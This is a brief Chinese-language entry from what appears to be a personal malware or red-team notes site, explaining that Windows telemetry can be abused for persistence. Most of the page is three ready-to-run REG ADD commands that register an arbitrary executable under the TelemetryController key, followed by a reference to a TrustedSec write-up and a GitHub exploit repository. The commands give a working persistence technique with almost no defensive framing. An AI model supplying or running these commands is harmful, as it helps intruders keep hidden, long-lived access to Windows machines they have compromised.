M
M
Malware Note
搜索文档…
Windows Telemetry
在Windows 7之后的Windows操作系统都存在这一个监测数据收集服务,如果加入了Microsoft用户反馈改善计划,该服务就会监测系统异常并收集反馈到微软。
命令行:
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Command /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Nightly /t REG_DWORD /d 1 /f
原理:
Abusing Windows Telemetry for Persistence - TrustedSec
TrustedSec
利用代码:
GitHub - 360-Linton-Lab/Telemetry: WINDOWS TELEMETRY权限维持
GitHub
复制链接